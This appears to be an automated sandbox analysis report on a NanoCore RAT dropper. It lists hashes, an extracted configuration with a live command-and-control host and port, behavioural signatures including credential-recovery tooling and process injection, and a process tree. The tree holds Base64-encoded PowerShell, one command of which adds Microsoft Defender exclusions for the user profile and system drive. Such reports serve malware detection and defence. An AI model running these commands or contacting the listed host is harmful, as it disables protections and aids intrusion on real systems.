Analysis
-
max time kernel
0s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
06/01/2024, 18:16
Static task
static1
Behavioral task
behavioral1
Sample
80C6039DC12399E3F771632F0A44C4C3.exe
Resource
win7-20231215-en
General
-
Target
80C6039DC12399E3F771632F0A44C4C3.exe
-
Size
1.6MB
-
MD5
80c6039dc12399e3f771632f0a44c4c3
-
SHA1
f609ba2e8bc0d4b395b83f38a4867fcdb9b6bfdd
-
SHA256
f6b10c59c9ce33c5c8f6b02c3293fe5d479e59542698c91b15af74bcce50ab8f
-
SHA512
83b8fb0f9943c11012a82049d7861a3b7ec9753036de402c82ac433a5235cb95a104dd69b29ed110cd9dfe3b8ab062d916956f6f66864bf79876e926c2c5a6a5
-
SSDEEP
49152:2dh0Omwse7edN51glfneOTS9rFJMkn4Rli/Ea:2dcwN25efeIS9rF6k4RQM
Malware Config
Extracted
nanocore
1.2.2.0
links-transition.gl.at.ply.gg:41958
127.0.0.1:41958
973dbaac-5242-4f6a-aaef-307dad24cdde
-
activate_away_mode
true
-
backup_connection_host
127.0.0.1
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2023-10-14T03:00:38.071092836Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
41958
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
973dbaac-5242-4f6a-aaef-307dad24cdde
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
links-transition.gl.at.ply.gg
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3392-187-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral2/memory/3392-185-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView -
Nirsoft 2 IoCs
resource yara_rule behavioral2/memory/3392-187-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/3392-185-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 80C6039DC12399E3F771632F0A44C4C3.exe -
Executes dropped EXE 1 IoCs
pid Process 4260 shadowscripts fixed.exe -
Uses the VBS compiler for execution 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1512 wrote to memory of 4260 1512 80C6039DC12399E3F771632F0A44C4C3.exe 37 PID 1512 wrote to memory of 4260 1512 80C6039DC12399E3F771632F0A44C4C3.exe 37 PID 1512 wrote to memory of 4260 1512 80C6039DC12399E3F771632F0A44C4C3.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"C:\Users\Admin\AppData\Local\Temp\80C6039DC12399E3F771632F0A44C4C3.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Users\Admin\AppData\Local\Temp\sanas.scr"C:\Users\Admin\AppData\Local\Temp\sanas.scr" /S2⤵PID:2044
-
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"3⤵PID:1136
-
-
-
C:\Users\Admin\AppData\Local\Temp\microsofts.exe"C:\Users\Admin\AppData\Local\Temp\microsofts.exe"2⤵PID:3124
-
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\bo2ezzp0.hxi"3⤵PID:2896
-
-
\??\c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe"c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe" /shtml "C:\Users\Admin\AppData\Local\Temp\zx0bpzxl.geg"3⤵PID:3392
-
-
-
C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"C:\Users\Admin\AppData\Local\Temp\shadowscripts fixed.exe"2⤵
- Executes dropped EXE
PID:4260
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcAB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAeQBqACMAPgA="1⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"1⤵PID:944
-
C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe"2⤵PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\Server2223.exe"C:\Users\Admin\AppData\Local\Temp\Server2223.exe"1⤵PID:672
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:3712
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"1⤵PID:3204
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGoAcQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAaQBmACAAZQByAHIAbwByAHMAIABjAG8AbgB0AGEAYwB0ACAAbQBlACAAbQBhAGkAawBrAGkANAAyADAAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHMAbABwACMAPgA="1⤵PID:4280
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
913KB
MD5799c188cf6df366f4c0f98b8800a4977
SHA1161d6006518879ecba6cf45b29599992d8eadfce
SHA25632e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841
SHA51232a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1
-
Filesize
893KB
MD5bfb9089bf4cd2ee95a235603efb29895
SHA1511ad28599d423f16be8cacf3ce60088fe556f51
SHA256b467b658e82b8d57d736a486bdd02fb20d34ab47da7176feae60dff285033c23
SHA512df46a060a5ac315969e943ac9b121877ba3a348c2ca8dac34d4fda3ab9bf11bce880bb82761274e88d139f9c8bc8f60c5bae43224833bf50f0414220b4ffc6f0
-
Filesize
183KB
MD5b9d1be8ae4f4a7a77f309b032a914564
SHA13b9da974e959adbb0f12705c64fd58e0c8ec5b18
SHA2565f9c9f9af0dc5779d63ea334443d512d675b99c588f2505b652d49d02650c3ba
SHA512dfadf27f176fe700df9dd9a979e030d362e906a25815eccb1a40c09d8dfee542a75ababbc361833742891fd5d0358233ad68cac05c12aedca1e5d93ae370fc14
-
Filesize
93KB
MD586757f6c08b6cb698250cc9fc1816a8e
SHA1fa8a2fbc982943a031ad202b3e4b1cdb11bcff6a
SHA25698fa9c5139362be3e25333a7c48229ed220cc61c0dc41b8270e66d2886aa7dff
SHA512cb87cf73deda4299561af9e7c4d65a82816ca5f82890edd76cfec258dbf973b197cd6c40bca2f8643d39f451072e71c5f9529864689cc68097a4382bec97a7dc
-
Filesize
3KB
MD502524418240369b25b988e9884cd1c54
SHA142a33322d952edf6d8431d4cd788bbc863d2b890
SHA25680b2a0874c2f734dfe1196d7ae2a7bc6ccb30df2d9281513ac33edc529a71a37
SHA5127c5bbe911f7f0b072d6fdb89ea5759655c2b5cf9ebfddff8f2f67f956141b8ed3697ab0504f60c3992849afbbc79434043a6c04d7cf6ddd958e23354fd3a698f
-
Filesize
202KB
MD55fdd418baf9c0d789e67758ad9f2dd1a
SHA1c0be3be193af670cfe01a64aef7c5b0a0b9d091a
SHA25682f59d1a1a65c0651ae7a965bb6481ba1351ea9efc9f9457de372043709e5a47
SHA5129ace7aed4e4db6f2df7a8df22227079acf176cb7b7e90a0d2638dfd44296653fae6194531a7335fb10fd9396f3cd4f11621715b2a2e4f948209055a809b00c50
-
Filesize
183KB
MD5b7cedaa564e3fb095f94aef59f7ed0da
SHA13f93a84f2d290840cfb5418e15c47dda39ab967d
SHA256526a5aae8d6af5d4af48bef2bf37f6a79b1584b7b48d32bef6a2f6f4ee69ccfc
SHA51218d274dba047179d7cc6b2bb14ede76618bf5c93d8a4b4d1a32bbcf2f6494c9ecc4a601a5a4eae5d7672967be5c3a0c5bfc402f97626638ba7825d6412538f7d
-
Filesize
1.2MB
MD54c624867a94fee20d81b9e14755165de
SHA16f5afb06ff6278616f8fb0cd81ad1e164b0fee24
SHA2569a1ef7b5af62c005df90a75846e390e1695ecd18c7727b8e039e4b5842d6f388
SHA5120a40dc67d116b9726c3129a88e82c536273b4ad42f850ca78828b042dc5d20313caf1ee8a8a7136efab6027fa2f7bcf1551fac61f239c10d865f5664a8006064
-
Filesize
523B
MD569b2a2e17e78d24abee9f1de2f04811a
SHA1d19c109704e83876ab3527457f9418a7d053aa33
SHA2561b1491f21e64681f8fdc27b2265e2274fb7813eecb6ad8b446d2e431f6300edd
SHA512eb7269979bc4187520636fe3d7b3089f2c7c02e81c4ce2a738ade680f72c61c67fe9577eeaa09d3ca93f34b60be8c434d2cfbfed6566e783f6611279f056150f